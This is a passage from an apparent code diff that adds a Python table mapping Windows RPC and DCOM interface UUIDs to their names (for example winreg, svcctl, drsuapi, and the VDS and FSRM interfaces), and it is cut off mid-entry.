(uuid.UUID("1257b580-ce2f-4109-82d6-a9459d0bf6bc"), "SessEnvPublicRpc"), + (uuid.UUID("12937789-e247-4917-9c20-f3ee9c7ee783"), "IFsrmActionCommand"), + (uuid.UUID("135698d2-3a37-4d26-99df-e2bb6ae3ac61"), "IVolumeClient3"), + (uuid.UUID("13b50bff-290a-47dd-8558-b7c58db1a71a"), "IVdsPack2"), + (uuid.UUID("144fe9b0-d23d-4a8b-8634-fb4457533b7a"), "IUpdate2"), + (uuid.UUID("14a8831c-bc82-11d2-8a64-0008c7457e5d"), "ExtendedError"), + (uuid.UUID("14fbe036-3ed7-4e10-90e9-a5ff991aff01"), "IVdsServiceIscsi"), + (uuid.UUID("1518b460-6518-4172-940f-c75883b24ceb"), "IUpdateService2"), + (uuid.UUID("1544f5e0-613c-11d1-93df-00c04fd7bd09"), "rfri"), + (uuid.UUID("1568a795-3924-4118-b74b-68d8f0fa5daf"), "IFsrmQuotaBase"), + (uuid.UUID("15a81350-497d-4aba-80e9-d4dbcc5521fe"), "IFsrmStorageModuleDefinition"), + (uuid.UUID("15fc031c-0652-4306-b2c3-f558b8f837e2"), "IVdsServiceSw"), + (uuid.UUID("17fdd703-1827-4e34-79d4-24a55c53bb37"), "msgsvc"), + (uuid.UUID("182c40fa-32e4-11d0-818b-00a0c9231c29"), "ICatalogSession"), + (uuid.UUID("1a9134dd-7b39-45ba-ad88-44d01ca47f28"), "RemoteRead"), + (uuid.UUID("1a927394-352e-4553-ae3f-7cf4aafca620"), "WdsRpcInterface"), + (uuid.UUID("1bb617b8-3886-49dc-af82-a6c90fa35dda"), "IFsrmMutableCollection"), + (uuid.UUID("1be2275a-b315-4f70-9e44-879b3a2a53f2"), "IVdsVolumeOnline"), + (uuid.UUID("1c1c45ee-4395-11d2-b60b-00104b703efd"), "IWbemFetchSmartEnum"), + (uuid.UUID("1d118904-94b3-4a64-9fa6-ed432666a7b9"), "ICatalog64BitSupport"), + (uuid.UUID("1e062b84-e5e6-4b4b-8a25-67b81e8f13e8"), "IVdsVDisk"), + (uuid.UUID("1f7b1697-ecb2-4cbb-8a0e-75c427f4a6f0"), "IImport2"), + (uuid.UUID("1ff70682-0a51-30e8-076d-740be8cee98b"), "atsvc"), + (uuid.UUID("205bebf8-dd93-452a-95a6-32b566b35828"), "IFsrmFileScreenTemplate"), + (uuid.UUID("20610036-fa22-11cf-9823-00a0c911e5df"), "rasrpc"), + (uuid.UUID("20d15747-6c48-4254-a358-65039fd8c63c"), "IServerHealthReport2"), + ( + uuid.UUID("214a0f28-b737-4026-b847-4f9e37d79529"), + "IVssDifferentialSoftwareSnapshotMgmt", + ), + (uuid.UUID("21546ae8-4da5-445e-987f-627fea39c5e8"), "IWRMConfig"), + (uuid.UUID("22bcef93-4a3f-4183-89f9-2f8b8a628aee"), "IFsrmObject"), + (uuid.UUID("22e5386d-8b12-4bf0-b0ec-6a1ea419e366"), "NetEventForwarder"), + (uuid.UUID("23857e3c-02ba-44a3-9423-b1c900805f37"), "IUpdateServiceManager"), + (uuid.UUID("23c9dd26-2355-4fe2-84de-f779a238adbd"), "IProcessDump"), + (uuid.UUID("27b899fe-6ffa-4481-a184-d3daade8a02b"), "IFsrmReportManager"), + (uuid.UUID("27e94b0d-5139-49a2-9a61-93522dc54652"), "IUpdate4"), + (uuid.UUID("29822ab7-f302-11d0-9953-00c04fd919c1"), "IWamAdmin"), + (uuid.UUID("29822ab8-f302-11d0-9953-00c04fd919c1"), "IWamAdmin2"), + (uuid.UUID("2a3eb639-d134-422d-90d8-aaa1b5216202"), "IResourceManager2"), + (uuid.UUID("2abd757f-2851-4997-9a13-47d2a885d6ca"), "IVdsHbaPort"), + (uuid.UUID("2c9273e0-1dc3-11d3-b364-00105a1f8177"), "IWbemRefreshingServices"), + (uuid.UUID("2d9915fb-9d42-4328-b782-1b46819fab9e"), "IAppHostMethodSchema"), + (uuid.UUID("2dbe63c4-b340-48a0-a5b0-158e07fc567e"), "IFsrmActionReport"), + (uuid.UUID("300f3532-38cc-11d0-a3f0-0020af6b0add"), "trkwks"), + (uuid.UUID("31a83ea0-c0e4-4a2c-8a01-353cc2a4c60a"), "IAppHostMappingExtension"), + (uuid.UUID("326af66f-2ac0-4f68-bf8c-4759f054fa29"), "IFsrmPropertyCondition"), + (uuid.UUID("338cd001-2244-31f1-aaaa-900038001003"), "winreg"), + (uuid.UUID("367abb81-9844-35f1-ad32-98f038001003"), "svcctl"), + (uuid.UUID("370af178-7758-4dad-8146-7391f6e18585"), "IAppHostConfigLocation"), + (uuid.UUID("377f739d-9647-4b8e-97d2-5ffce6d759cd"), "IFsrmQuota"), + (uuid.UUID("378e52b0-c0a9-11cf-822d-00aa0051e40f"), "sasec"), + (uuid.UUID("3858c0d5-0f35-4bf5-9714-69874963bc36"), "IVdsAdvancedDisk3"), + (uuid.UUID("38a0a9ab-7cc8-4693-ac07-1f28bd03c3da"), "IVdsIscsiInitiatorPortal"), + (uuid.UUID("38e87280-715c-4c7d-a280-ea1651a19fef"), "IFsrmReportJob"), + (uuid.UUID("3919286a-b10c-11d0-9ba8-00c04fd92ef5"), "dssetup"), + (uuid.UUID("39322a2d-38ee-4d0d-8095-421a80849a82"), "IFsrmDerivedObjectsResult"), + (uuid.UUID("3a410f21-553f-11d1-8e5e-00a0c92c9d5d"), "IDMRemoteServer"), + (uuid.UUID("3a56bfb8-576c-43f7-9335-fe4838fd7e37"), "ICategoryCollection"), + (uuid.UUID("3b69d7f5-9d94-4648-91ca-79939ba263bf"), "IVdsPack"), + (uuid.UUID("3bbed8d9-2c9a-4b21-8936-acb2f995be6c"), "INtmsObjectManagement3"), + (uuid.UUID("3dde7c30-165d-11d1-ab8f-00805f14db40"), "BackupKey"), + (uuid.UUID("3f3b1b86-dbbe-11d1-9da6-00805f85cfe3"), "IContainerControl"), + (uuid.UUID("40f73c8b-687d-4a13-8d96-3d7f2e683936"), "IVdsDisk2"), + (uuid.UUID("41208ee0-e970-11d1-9b9e-00e02c064c39"), "qmmgmt"), + (uuid.UUID("4173ac41-172d-4d52-963c-fdc7e415f717"), "IFsrmQuotaTemplateManager"), + (uuid.UUID("423ec01e-2e35-11d2-b604-00104b703efd"), "IWbemWCOSmartEnum"), + (uuid.UUID("426677d5-018c-485c-8a51-20b86d00bdc4"), "IFsrmFileGroupManager"), + (uuid.UUID("42dc3511-61d5-48ae-b6dc-59fc00c0a8d6"), "IFsrmQuotaObject"), + (uuid.UUID("44aca674-e8fc-11d0-a07c-00c04fb68820"), "IWbemContext"), + (uuid.UUID("44aca675-e8fc-11d0-a07c-00c04fb68820"), "IWbemCallResult"), + (uuid.UUID("44e265dd-7daf-42cd-8560-3cdb6e7a2729"), "TsProxyRpcInterface"), + (uuid.UUID("450386db-7409-4667-935e-384dbbee2a9e"), "IAppHostPropertySchema"), + (uuid.UUID("456129e2-1078-11d2-b0f9-00805fc73204"), "ICatalogUtils"), + (uuid.UUID("45f52c28-7f9f-101a-b52b-08002b2efabe"), "winsif"), + (uuid.UUID("46297823-9940-4c09-aed9-cd3ea6d05968"), "IUpdateIdentity"), + (uuid.UUID("4639db2a-bfc5-11d2-9318-00c04fbbbfb3"), "IDataFactory3"), + (uuid.UUID("47782152-d16c-4229-b4e1-0ddfe308b9f6"), "IFsrmPropertyDefinition2"), + (uuid.UUID("47cde9a1-0bf6-11d2-8016-00c04fb9988e"), "ICapabilitySupport"), + (uuid.UUID("481e06cf-ab04-4498-8ffe-124a0a34296d"), "IWRMCalendar"), + (uuid.UUID("4846cb01-d430-494f-abb4-b1054999fb09"), "IFsrmQuotaManagerEx"), + (uuid.UUID("484809d6-4239-471b-b5bc-61df8c23ac48"), "TermSrvSession"), + (uuid.UUID("497d95a6-2d27-4bf5-9bbd-a6046957133c"), "RCMListener"), + (uuid.UUID("49ebd502-4a96-41bd-9e3e-4c5057f4250c"), "IWindowsDriverUpdate3"), + (uuid.UUID("4a2f5c31-cfd9-410e-b7fb-29a653973a0f"), "IAutomaticUpdates2"), + (uuid.UUID("4a6b0e15-2e38-11d1-9965-00c04fbbb345"), "IEventSubscription"), + (uuid.UUID("4a6b0e16-2e38-11d1-9965-00c04fbbb345"), "IEventSubscription2"), + (uuid.UUID("4a73fee4-4102-4fcc-9ffb-38614f9ee768"), "IFsrmProperty"), + (uuid.UUID("4afc3636-db01-4052-80c3-03bbcb8d3c69"), "IVdsServiceInitialization"), + (uuid.UUID("4b324fc8-1670-01d3-1278-5a47bf6ee188"), "srvsvc"), + (uuid.UUID("4bb8ab1d-9ef9-4100-8eb6-dd4b4e418b72"), "IADProxy"), + (uuid.UUID("4bdafc52-fe6a-11d2-93f8-00105a11164a"), "IVolumeClient2"), + (uuid.UUID("4c8f96c3-5d94-4f37-a4f4-f56ab463546f"), "IFsrmActionEventLog"), + (uuid.UUID("4cbdcb2d-1589-4beb-bd1c-3e582ff0add0"), "IUpdateSearcher2"), + (uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57"), "IActivation"), + (uuid.UUID("4da1c422-943d-11d1-acae-00c04fc2aa3f"), "trksvr"), + (uuid.UUID("4daa0135-e1d1-40f1-aaa5-3cc1e53221c3"), "IVdsVolumePlex"), + (uuid.UUID("4dbcee9a-6343-4651-b85f-5e75d74d983c"), "IVdsVolumeMF2"), + (uuid.UUID("4dfa1df3-8900-4bc7-bbb5-d1a458c52410"), "IAppHostConfigException"), + (uuid.UUID("4e14fb9f-2e22-11d1-9964-00c04fbbb345"), "IEventSystem"), + (uuid.UUID("4e6cdcc9-fb25-4fd5-9cc5-c9f4b6559cec"), "IComTrackingInfoEvents"), + (uuid.UUID("4e934f30-341a-11d1-8fb1-00a024cb6019"), "INtmsLibraryControl1"), + (uuid.UUID("4f7ca01c-a9e5-45b6-b142-2332a1339c1d"), "IWRMAccounting"), + (uuid.UUID("4fc742e0-4a10-11cf-8273-00aa004ae673"), "netdfs"), + (uuid.UUID("503626a3-8e14-4729-9355-0fe664bd2321"), "IUpdateExceptionCollection"), + (uuid.UUID("50abc2a4-574d-40b3-9d66-ee4fd5fba076"), "DnsServer"), + ( + uuid.UUID("515c1277-2c81-440e-8fcf-367921ed4f59"), + "IFsrmPipelineModuleDefinition", + ), + (uuid.UUID("5261574a-4572-206e-b268-6b199213b4e4"), "asyncemsmdb"), + (uuid.UUID("52c80b95-c1ad-4240-8d89-72e9fa84025e"), "IClusCfgAsyncEvictCleanup"), + (uuid.UUID("538684e0-ba3d-4bc0-aca9-164aff85c2a9"), "IVdsDiskPartitionMF"), + (uuid.UUID("53b46b02-c73b-4a3e-8dee-b16b80672fc0"), "TSVIPPublic"), + (uuid.UUID("541679ab-2e5f-11d3-b34e-00104bcc4b4a"), "IWbemLoginHelper"), + (uuid.UUID("5422fd3a-d4b8-4cef-a12e-e87d4ca22e90"), "ICertRequestD2"), + (uuid.UUID("54a2cb2d-9a0c-48b6-8a50-9abb69ee2d02"), "IUpdateDownloadContent"), + (uuid.UUID("59602eb6-57b0-4fd8-aa4b-ebf06971fe15"), "IWRMPolicy"), + (uuid.UUID("5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc"), "msgsvcsend"), + ( + uuid.UUID("5b5a68e6-8b9f-45e1-8199-a95ffccdffff"), + "IAppHostConstantValueCollection", + ), + (uuid.UUID("5b821720-f63b-11d0-aad2-00c04fc324db"), "dhcpsrv2"), + (uuid.UUID("5ca4a760-ebb1-11cf-8611-00a0245420ed"), "IcaApi"), + (uuid.UUID("5f6325d3-ce88-4733-84c1-2d6aefc5ea07"), "IFsrmFileScreen"), + (uuid.UUID("5ff9bdf6-bd91-4d8b-a614-d6317acc8dd8"), "IRemoteSstpCertCheck"), + (uuid.UUID("6099fc12-3eff-11d0-abd0-00c04fd91a4e"), "faxclient"), + (uuid.UUID("6139d8a4-e508-4ebb-bac7-d7f275145897"), "IRemoteIPV6Config"), + (uuid.UUID("615c4269-7a48-43bd-96b7-bf6ca27d6c3e"), "IWindowsDriverUpdate2"), + (uuid.UUID("64ff8ccc-b287-4dae-b08a-a72cbf45f453"), "IAppHostElement"), + (uuid.UUID("6619a740-8154-43be-a186-0319578e02db"), "IRemoteDispatch"), + (uuid.UUID("66a2db1b-d706-11d0-a37b-00c04fc9da04"), "IRemoteNetworkConfig"), + (uuid.UUID("66a2db20-d706-11d0-a37b-00c04fc9da04"), "IRemoteRouterRestart"), + (uuid.UUID("66a2db21-d706-11d0-a37b-00c04fc9da04"), "IRemoteSetDnsConfig"), + (uuid.UUID("66a2db22-d706-11d0-a37b-00c04fc9da04"), "IRemoteICFICSConfig"), + (uuid.UUID("673425bf-c082-4c7c-bdfd-569464b8e0ce"), "IAutomaticUpdates"), + (uuid.UUID("6788faf9-214e-4b85-ba59-266953616e09"), "IVdsVolumeMF3"), + (uuid.UUID("67e08fc2-2984-4b62-b92e-fc1aae64bbbb"), "IRemoteStringIdConfig"), + (uuid.UUID("6879caf9-6617-4484-8719-71c3d8645f94"), "IFsrmReportScheduler"), + (uuid.UUID("69ab7050-3059-11d1-8faf-00a024cb6019"), "INtmsObjectInfo1"), + (uuid.UUID("6a92b07a-d821-4682-b423-5c805022cc4d"), "IUpdate"), + (uuid.UUID("6b5bdd1e-528c-422c-af8c-a4079be4fe48"), "RemoteFW"), + (uuid.UUID("6bffd098-a112-3610-9833-012892020162"), "browser"), + (uuid.UUID("6bffd098-a112-3610-9833-46c3f874532d"), "dhcpsrv"), + (uuid.UUID("6bffd098-a112-3610-9833-46c3f87e345a"), "wkssvc"), + (uuid.UUID("6c935649-30a6-4211-8687-c4c83e5fe1c7"), "IContainerControl2"), + (uuid.UUID("6cd6408a-ae60-463b-9ef1-e117534d69dc"), "IFsrmAction"), + (uuid.UUID("6e6f6b40-977c-4069-bddd-ac710059f8c0"), "IVdsAdvancedDisk"), + (uuid.UUID("6f4dbfff-6920-4821-a6c3-b7e94c1fd60c"), "IFsrmPathMapper"), + (uuid.UUID("708cca10-9569-11d1-b2a5-0060977d8118"), "dscomm2"), + (uuid.UUID("70b51430-b6ca-11d0-b9b9-00a0c922e750"), "IMSAdminBaseW"), + (uuid.UUID("70cf5c82-8642-42bb-9dbc-0cfd263c6c4f"), "IWindowsDriverUpdate5"), + (uuid.UUID("72ae6713-dcbb-4a03-b36b-371f6ac6b53d"), "IVdsVolume2"), + (uuid.UUID("75c8f324-f715-4fe3-a28e-f9011b61a4a1"), "IVdsOpenVDisk"), + (uuid.UUID("76b3b17e-aed6-4da5-85f0-83587f81abe3"), "IUpdateService"), + (uuid.UUID("76d12b80-3467-11d3-91ff-0090272f9ea3"), "qmcomm2"), + (uuid.UUID("76f03f96-cdfd-44fc-a22c-64950a001209"), "IRemoteWinspool"), + (uuid.UUID("77df7a80-f298-11d0-8358-00a024c480a8"), "dscomm"), + (uuid.UUID("784b693d-95f3-420b-8126-365c098659f2"), "IOCSPAdminD"), + (uuid.UUID("7883ca1c-1112-4447-84c3-52fbeb38069d"), "IAppHostMethod"), + (uuid.UUID("7c44d7d4-31d5-424c-bd5e-2b3e1f323d22"), "dsaop"), + (uuid.UUID("7c4e1804-e342-483d-a43e-a850cfcc8d18"), "IIISApplicationAdmin"), + (uuid.UUID("7c857801-7381-11cf-884d-00aa004b2e24"), "IWbemObjectSink"), + (uuid.UUID("7c907864-346c-4aeb-8f3f-57da289f969f"), "IImageInformation"), + (uuid.UUID("7d07f313-a53f-459a-bb12-012c15b1846e"), "IRobustNtmsMediaServices1"), + (uuid.UUID("7f43b400-1a0e-4d57-bbc9-6b0c65f7a889"), "IAlternateLaunch"), + (uuid.UUID("7fb7ea43-2d76-4ea8-8cd9-3decc270295e"), "IEventClass3"), + (uuid.UUID("7fe0d935-dda6-443f-85d0-1cfb58fe41dd"), "ICertAdminD2"), + (uuid.UUID("811109bf-a4e1-11d1-ab54-00a0c91e9b45"), "winsi2"), + (uuid.UUID("8165b19e-8d3a-4d0b-80c8-97de310db583"), "IServicedComponentInfo"), + (uuid.UUID("816858a4-260d-4260-933a-2585f1abc76b"), "IUpdateSession"), + (uuid.UUID("81ddc1b8-9d35-47a6-b471-5b80f519223b"), "ICategory"), + (uuid.UUID("82273fdc-e32a-18c3-3f78-827929dc23ea"), "eventlog"), + (uuid.UUID("8276702f-2532-4839-89bf-4872609a2ea4"), "IFsrmActionEmail2"), + (uuid.UUID("8298d101-f992-43b7-8eca-5052d885b995"), "IMSAdminBase2W"), + (uuid.UUID("82ad4280-036b-11cf-972c-00aa006887b0"), "inetinfo"), + (uuid.UUID("8326cd1d-cf59-4936-b786-5efc08798e25"), "IVdsAdviseSink"), + ( + uuid.UUID("832a32f7-b3ea-4b8c-b260-9a2923001184"), + "IAppHostConfigLocationCollection", + ), + (uuid.UUID("833e4100-aff7-4ac3-aac2-9f24c1457bce"), "IPCHCollection"), + (uuid.UUID("833e41aa-aff7-4ac3-aac2-9f24c1457bce"), "ISAFSession"), + (uuid.UUID("83bfb87f-43fb-4903-baa6-127f01029eec"), "IVdsSubSystemImportTarget"), + (uuid.UUID("85713fa1-7796-4fa2-be3b-e2d6124dd373"), "IWindowsUpdateAgentInfo"), + (uuid.UUID("86d35949-83c9-4044-b424-db363231fd0c"), "ITaskSchedulerService"), + (uuid.UUID("879c8bbe-41b0-11d1-be11-00c04fb6bf70"), "IClientSink"), + (uuid.UUID("88143fd0-c28d-4b2b-8fef-8d882f6a9390"), "TermSrvEnumeration"), + (uuid.UUID("88306bb2-e71f-478c-86a2-79da200a0f11"), "IVdsVolume"), + (uuid.UUID("894de0c0-0d55-11d3-a322-00c04fa321a1"), "InitShutdown"), + (uuid.UUID("895a2c86-270d-489d-a6c0-dc2a9b35280e"), "INtmsObjectManagement2"), + (uuid.UUID("897e2e5f-93f3-4376-9c9c-fd2277495c27"), "FrsTransport"), + (uuid.UUID("8bb68c7d-19d8-4ffb-809e-be4fc1734014"), "IFsrmQuotaManager"), + ( + uuid.UUID("8bed2c68-a5fb-4b28-8581-a0dc5267419f"), + "IAppHostPropertySchemaCollection", + ), + (uuid.UUID("8db2180e-bd29-11d1-8b7e-00c04fd7a924"), "IRegister"), + (uuid.UUID("8dd04909-0e34-4d55-afaa-89e1f1a1bbb9"), "IFsrmFileGroup"), + (uuid.UUID("8f09f000-b7ed-11ce-bbd2-00001a181cad"), "dimsvc"), + (uuid.UUID("8f45abf1-f9ae-4b95-a933-f0f66e5056ea"), "IUpdateSearcher"), + (uuid.UUID("8f4b2f5d-ec15-4357-992f-473ef10975b9"), "IVdsDisk3"), + (uuid.UUID("8f6d760f-f0cb-4d69-b5f6-848b33e9bdc6"), "IAppHostConfigManager"), + (uuid.UUID("8fb6d884-2388-11d0-8c35-00c04fda2795"), "W32Time"), + (uuid.UUID("90681b1d-6a7f-48e8-9061-31b7aa125322"), "IVdsDiskOnline"), + (uuid.UUID("906b0ce0-c70b-1067-b317-00dd010662da"), "IXnRemote"), + (uuid.UUID("918efd1e-b5d8-4c90-8540-aeb9bdc56f9d"), "IUpdateSession3"), + (uuid.UUID("91ae6020-9e3c-11cf-8d7c-00aa00c091be"), "ICertPassage"), + (uuid.UUID("91caf7b0-eb23-49ed-9937-c52d817f46f7"), "IUpdateSession2"), + (uuid.UUID("943991a5-b3fe-41fa-9696-7f7b656ee34b"), "IWRMMachineGroup"), + (uuid.UUID("9556dc99-828c-11cf-a37e-00aa003240c7"), "IWbemServices"), + (uuid.UUID("96deb3b5-8b91-4a2a-9d93-80a35d8aa847"), "IFsrmCommittableCollection"), + (uuid.UUID("971668dc-c3fe-4ea1-9643-0c7230f494a1"), "IRegister2"), + (uuid.UUID("97199110-db2e-11d1-a251-0000f805ca53"), "ITransactionStream"), + (uuid.UUID("9723f420-9355-42de-ab66-e31bb15beeac"), "IVdsAdvancedDisk2"), + (uuid.UUID("98315903-7be5-11d2-adc1-00a02463d6e7"), "IReplicationUtil"), + (uuid.UUID("9882f547-cfc3-420b-9750-00dfbec50662"), "IVdsCreatePartitionEx"), + (uuid.UUID("99cc098f-a48a-4e9c-8e58-965c0afc19d5"), "IEventSystem2"), + (uuid.UUID("99fcfec4-5260-101b-bbcb-00aa0021347a"), "IObjectExporter"), + (uuid.UUID("9a2bf113-a329-44cc-809a-5c00fce8da40"), "IFsrmQuotaTemplateImported"), + (uuid.UUID("9aa58360-ce33-4f92-b658-ed24b14425b8"), "IVdsSwProvider"), + (uuid.UUID("9b0353aa-0e52-44ff-b8b0-1f7fa0437f88"), "IUpdateServiceCollection"), + (uuid.UUID("9be77978-73ed-4a9a-87fd-13f09fec1b13"), "IAppHostAdminManager"), + (uuid.UUID("9cbe50ca-f2d2-4bf4-ace1-96896b729625"), "IVdsDiskPartitionMF2"), + ( + uuid.UUID("9d07ca0d-8f02-4ed5-b727-acf37fea5bbc"), + "ISingleSignonRemoteMasterSecret", + ), + (uuid.UUID("a0e8f27a-888c-11d1-b763-00c04fb926af"), "IEventSystemInitialize"), + (uuid.UUID("a2efab31-295e-46bb-b976-e86d58b52e8b"), "IFsrmQuotaTemplate"), + (uuid.UUID("a359dec5-e813-4834-8a2a-ba7f1d777d76"), "IWbemBackupRestoreEx"), + (uuid.UUID("a35af600-9cf4-11cd-a076-08002b2bd711"), "type_scard_pack"), + (uuid.UUID("a376dd5e-09d4-427f-af7c-fed5b6e1c1d6"), "IUpdateException"), + (uuid.UUID("a4f1db00-ca47-1067-b31f-00dd010662da"), "emsmdb"), + ( + uuid.UUID("a7f04f3c-a290-435b-aadf-a116c3357a5c"), + "IUpdateHistoryEntryCollection", + ), + (uuid.UUID("a8927a41-d3ce-11d1-8472-006008b0e5ca"), "ICatalogTableInfo"), + (uuid.UUID("a8e0653c-2744-4389-a61d-7373df8b2292"), "FileServerVssAgent"), + (uuid.UUID("ad55f10b-5f11-4be7-94ef-d9ee2e470ded"), "IFsrmFileGroupImported"), + (uuid.UUID("ada4e6fb-e025-401e-a5d0-c3134a281f07"), "IAppHostConfigFile"), + (uuid.UUID("ae1c7110-2f60-11d3-8a39-00c04f72d8e3"), "IVssEnumObject"), + (uuid.UUID("afa8bd80-7d8a-11c9-bef4-08002b102989"), "mgmt"), + (uuid.UUID("afc052c2-5315-45ab-841b-c6db0e120148"), "IFsrmClassificationRule"), + (uuid.UUID("afc07e2e-311c-4435-808c-c483ffeec7c9"), "lsacap"), + (uuid.UUID("b057dc50-3059-11d1-8faf-00a024cb6019"), "INtmsObjectManagement1"), + (uuid.UUID("b07fedd4-1682-4440-9189-a39b55194dc5"), "IVdsIscsiInitiatorAdapter"), + (uuid.UUID("b196b284-bab4-101a-b69c-00aa00341d07"), "IConnectionPointContainer"), + (uuid.UUID("b196b285-bab4-101a-b69c-00aa00341d07"), "IEnumConnectionPoints"), + (uuid.UUID("b196b286-bab4-101a-b69c-00aa00341d07"), "IConnectionPoint"), + (uuid.UUID("b196b287-bab4-101a-b69c-00aa00341d07"), "IEnumConnections"), + (uuid.UUID("b383cd1a-5ce9-4504-9f63-764b1236f191"), "IWindowsDriverUpdate"), + (uuid.UUID("b481498c-8354-45f9-84a0-0bdd2832a91f"), "IVdsVdProvider"), + (uuid.UUID("b60040e0-bcf3-11d1-861d-0080c729264d"), "IGetTrackingData"), + (uuid.UUID("b6b22da8-f903-4be7-b492-c09d875ac9da"), "IVdsServiceUninstallDisk"), + ( + uuid.UUID("b7d381ee-8860-47a1-8af4-1f33b2b1f325"), + "IAppHostSectionDefinitionCollection", + ), + (uuid.UUID("b80f3c42-60e0-4ae0-9007-f52852d3dbed"), "IAppHostMethodInstance"), + (uuid.UUID("b9785960-524f-11df-8b6d-83dcded72085"), "ISDKey"), + (uuid.UUID("b97db8b2-4c63-11cf-bff6-08002be23f2f"), "clusapi"), + (uuid.UUID("b97db8b2-4c63-11cf-bff6-08002be23f2f"), "clusapi"), + ( + uuid.UUID("bb36ea26-6318-4b8c-8592-f72dd602e7a5"), + "IFsrmClassifierModuleDefinition", + ), + (uuid.UUID("bb39332c-bfee-4380-ad8a-badc8aff5bb6"), "INtmsNotifySink"), + (uuid.UUID("bba9cb76-eb0c-462c-aa1b-5d8c34415701"), "Claims"), + ( + uuid.UUID("bc5513c8-b3b8-4bf7-a4d4-361c0d8c88ba"), + "IUpdateDownloadContentCollection", + ), + (uuid.UUID("bc681469-9dd9-4bf4-9b3d-709f69efe431"), "IWRMResourceGroup"), + (uuid.UUID("bd0c73bc-805b-4043-9c30-9a28d64dd7d2"), "IIISCertObj"), + (uuid.UUID("bd7c23c2-c805-457c-8f86-d17fe6b9d19f"), "IClusterLogEx"), + (uuid.UUID("bde95fdf-eee0-45de-9e12-e5a61cd0d4fe"), "RCMPublic"), + (uuid.UUID("be56a644-af0e-4e0e-a311-c1d8e695cbff"), "IUpdateHistoryEntry"), + (uuid.UUID("bee7ce02-df77-4515-9389-78f01c5afc1a"), "IFsrmFileScreenException"), + (uuid.UUID("c1c2f21a-d2f4-4902-b5c6-8a081c19a890"), "IUpdate5"), + (uuid.UUID("c2be6970-df9e-11d1-8b87-00c04fd7a924"), "IImport"), + (uuid.UUID("c2bfb780-4539-4132-ab8c-0a8772013ab6"), "IUpdateHistoryEntry2"), + (uuid.UUID("c3fcc19e-a970-11d2-8b5a-00a0c9b7c9c4"), "IManagedObject"), + (uuid.UUID("c49e32c7-bc8b-11d2-85d4-00105a1f8304"), "IWbemBackupRestore"), + (uuid.UUID("c4b0c7d9-abe0-4733-a1e1-9fdedf260c7a"), "IADProxy2"), + (uuid.UUID("c5c04795-321c-4014-8fd6-d44658799393"), "IAppHostSectionDefinition"), + (uuid.UUID("c5cebee2-9df5-4cdd-a08c-c2471bc144b4"), "IResourceManager"), + (uuid.UUID("c681d488-d850-11d0-8c52-00c04fd90f7e"), "efsrpc"), + (uuid.UUID("c726744e-5735-4f08-8286-c510ee638fb6"), "ICatalogUtils2"), + (uuid.UUID("c8550bff-5281-4b1e-ac34-99b6fa38464d"), "IAppHostElementCollection"), + (uuid.UUID("c97ad11b-f257-420b-9d9f-377f733f6f68"), "IUpdateDownloadContent2"), + (uuid.UUID("cb0df960-16f5-4495-9079-3f9360d831df"), "IFsrmRule"), + (uuid.UUID("ccd8c074-d0e5-4a40-92b4-d074faa6ba28"), "Witness"), + (uuid.UUID("cfadac84-e12c-11d1-b34c-00c04f990d54"), "IExport"), + ( + uuid.UUID("cfe36cba-1949-4e74-a14f-f1d580ceaf13"), + "IFsrmFileScreenTemplateManager", + ), + (uuid.UUID("d02e4be0-3419-11d1-8fb1-00a024cb6019"), "INtmsMediaServices1"), + (uuid.UUID("d049b186-814f-11d1-9a3c-00c04fc9b232"), "NtFrsApi"), + (uuid.UUID("d2d79df5-3400-11d0-b40b-00aa005ff586"), "IVolumeClient"), + (uuid.UUID("d2d79df7-3400-11d0-b40b-00aa005ff586"), "IDMNotify"), + (uuid.UUID("d2dc89da-ee91-48a0-85d8-cc72a56f7d04"), "IFsrmClassificationManager"), + (uuid.UUID("d40cff62-e08c-4498-941a-01e25f0fd33c"), "ISearchResult"), + (uuid.UUID("d4781cd6-e5d3-44df-ad94-930efe48a887"), "IWbemLoginClientID"), + (uuid.UUID("d5d23b6d-5a55-4492-9889-397a3c2d2dbc"), "IVdsAsync"), + (uuid.UUID("d646567d-26ae-4caa-9f84-4e0aad207fca"), "IFsrmActionEmail"), + (uuid.UUID("d68168c9-82a2-4f85-b6e9-74707c49a58f"), "IVdsVolumeShrink"), + (uuid.UUID("d6c7cd8f-bb8d-4f96-b591-d3a5f1320269"), "IAppHostMethodCollection"), + (uuid.UUID("d8cc81d9-46b8-4fa4-bfa5-4aa9dec9b638"), "IFsrmReport"), + (uuid.UUID("d95afe70-a6d5-4259-822e-2c84da1ddb0d"), "WindowsShutdown"), + (uuid.UUID("d99bdaae-b13a-4178-9fdb-e27f16b4603e"), "IVdsHwProvider"), + (uuid.UUID("d99e6e70-fc88-11d0-b498-00a0c90312f3"), "ICertRequestD"), + (uuid.UUID("d99e6e71-fc88-11d0-b498-00a0c90312f3"), "ICertAdminD"), + (uuid.UUID("d9a59339-e245-4dbd-9686-4d5763e39624"), "IInstallationBehavior"), + (uuid.UUID("da5a86c5-12c2-4943-ab30-7f74a813d853"), "PerflibV2"), + (uuid.UUID("db90832f-6910-4d46-9f5e-9fd6bfa73903"), "INtmsLibraryControl2"), + (uuid.UUID("dc12a681-737f-11cf-884d-00aa004b2e24"), "IWbemClassObject"), + (uuid.UUID("dde02280-12b3-4e0b-937b-6747f6acb286"), "IUpdateServiceRegistration"), + (uuid.UUID("de095db1-5368-4d11-81f6-efef619b7bcf"), "IAppHostCollectionSchema"), + (uuid.UUID("deb01010-3a37-4d26-99df-e2bb6ae3ac61"), "IVolumeClient4"), + (uuid.UUID("e0393303-90d4-4a97-ab71-e9b671ee2729"), "IVdsServiceLoader"), + ( + uuid.UUID("e1010359-3e5d-4ecd-9fe4-ef48622fdf30"), + "IFsrmFileScreenTemplateImported", + ), + (uuid.UUID("e1af8308-5d1f-11c9-91a4-08002b14a0fa"), "ept"), + (uuid.UUID("e33c0cc4-0482-101a-bc0c-02608c6ba218"), "LocToLoc"), + (uuid.UUID("e3514235-4b06-11d1-ab04-00c04fc2dcd2"), "drsuapi"), + (uuid.UUID("e3d0d746-d2af-40fd-8a7a-0d7078bb7092"), "BitsPeerAuth"), + (uuid.UUID("e65e8028-83e8-491b-9af7-aaf6bd51a0ce"), "IServerHealthReport"), + (uuid.UUID("e7927575-5cc3-403b-822e-328a6b904bee"), "IAppHostPathMapper"), + (uuid.UUID("e7a4d634-7942-4dd9-a111-82228ba33901"), "IAutomaticUpdatesResults"), + (uuid.UUID("e8fb8620-588f-11d2-9d61-00c04f79c5fe"), "IIisServiceControl"), + (uuid.UUID("e946d148-bd67-4178-8e22-1c44925ed710"), 